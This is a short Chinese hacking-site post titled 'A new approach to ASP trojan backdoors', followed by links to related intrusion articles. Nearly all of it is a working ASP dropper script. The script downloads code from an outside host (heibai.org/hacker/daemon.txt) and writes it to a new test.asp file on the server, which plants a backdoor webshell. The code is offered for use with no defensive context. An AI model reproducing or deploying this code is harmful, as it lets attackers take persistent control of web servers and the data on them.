ASP木马后门新思路

所属分类: 实用技巧 / 漏洞研究 阅读数: 1828
收藏 0 赞 0 分享
<%  
Function GetPage(url)  
dim Retrieval  
Set Retrieval = createObject("Microsoft.XMLHTTP")  
With Retrieval  
.Open "Get", url, False ', "", ""  
.Send  
GetPage = BytesToBstr(.ResponseBody)  
End With  
Set Retrieval = Nothing  
End Function  

Function BytesToBstr(body)  
dim objstream  
set objstream = Server.createObject("adodb.stream")  
objstream.Type = 1  
objstream.Mode =3  
objstream.Open  
objstream.Write body  
objstream.Position = 0  
objstream.Type = 2  
objstream.Charset = "GB2312"  
BytesToBstr = objstream.ReadText  
objstream.Close  
set objstream = nothing  
End Function  
on error resume next  
Url="http://www.heibai.org/hacker/daemon.txt"  
response.write "开始取得远程代码........"  
wstr = GetPage(Url)  

Set fs=Server.createObject("Scripting.FileSystemObject")  

Set CrFi=fs.createTextFile(server.MapPath("./")&"\test.asp")  
Crfi.Writeline(wstr)  
set CrFi=nothing  
set fs=nothing  
response.write "...<font color=red>生成test.asp文件成功</font>"  
%>  
更多精彩内容其他人还在看

IDS入侵特征库创建实例解析

IDS入侵特征库创建实例解析
收藏 0 赞 0 分享

Access的跨库查询 (图)

Access的跨库查询 (图)
收藏 0 赞 0 分享

针对ACCESS漏洞又一发现

针对ACCESS漏洞又一发现
收藏 0 赞 0 分享

入侵之中杀防火墙进程的代码

入侵之中杀防火墙进程的代码
收藏 0 赞 0 分享

linux的病毒发展史及分类

linux的病毒发展史及分类
收藏 0 赞 0 分享

特络伊木马如何利用文件关联和设置名

特络伊木马如何利用文件关联和设置名
收藏 0 赞 0 分享

对RPC DCOM 蠕虫的设想

对RPC DCOM 蠕虫的设想
收藏 0 赞 0 分享

shell.application对象的漏洞描述

shell.application对象的漏洞描述
收藏 0 赞 0 分享

QQ尾巴病毒核心技术的实现

QQ尾巴病毒核心技术的实现
收藏 0 赞 0 分享

游戏外挂分析

游戏外挂分析
收藏 0 赞 0 分享
查看更多